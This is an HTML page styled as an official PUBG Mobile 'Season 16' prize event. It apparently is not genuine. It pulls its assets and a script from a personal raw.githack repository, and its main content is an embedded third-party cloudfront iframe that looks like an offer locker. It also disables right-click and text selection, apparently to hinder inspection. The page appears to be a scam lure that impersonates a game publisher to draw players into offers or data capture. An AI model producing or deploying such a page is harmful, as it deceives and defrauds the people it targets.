<html lang="en">
<head>
<meta charset="UTF-8"/>
<meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta property="og:title" content="PUBG MOBILE SEASON 16">
<meta name="description" content="Latest PUBG MOBILE Event. Get an exclusive SEASON 16 prize !!!">
<meta property="og:description" content="Latest PUBG MOBILE Event. Get an exclusive SEASON 16 prize !!!">
<meta property="og:url" content="./">
<meta property="og:site_name" content="PUBG MOBILE SEASON 16">
<meta property="og:type" content="website">
<meta name="copyright"content="PUBG MOBILE">
<meta name="theme-color" content="#000">
<meta property="og:image" content="https://i.ibb.co/hYnJR7g/125910984-807597803145849-8924472558573442407-n.jpg">
<title>PUBG MOBILE SEASON 16</title>
<link rel="stylesheet" href="https://raw.githack.com/ahmed-shamy/files/main/aaaaaaa/s.css">
<link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css">
<link rel="icon" href="https://f.top4top.io/p_1684y1a9m1.png">
</head>
<body oncontextmenu="return false" onselectstart="return false" ondragstart="return false">

<div class="loader">
	<img src="https://www.pubgmobile.com/en/event/pubgmxmetro/images/loading1.gif">
	<h1>Loading...</h1>
</div>

<section>


<div class="slogan">
	<img src="https://raw.githack.com/ahmed-shamy/files/main/aaaaaaa/pubgm.png">
	<img src="https://raw.githack.com/ahmed-shamy/files/main/aaaaaaa/x.png">
	<img src="https://raw.githack.com/ahmed-shamy/files/main/aaaaaaa/metroexodus.png">
</div>
	<center>
  <iframe src="https://d1xkyo9j4r7vnn.cloudfront.net/public/i_fr?it=1182208&key=c0be9" height="600" marginwidth="0" marginheight="0" align="middle" frameborder="0" width="100%" ></iframe>
		</center>
<script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
<script src="https://raw.githack.com/ahmed-shamy/files/main/aaaaaaa/styl.js"></script>
</body>
</html>
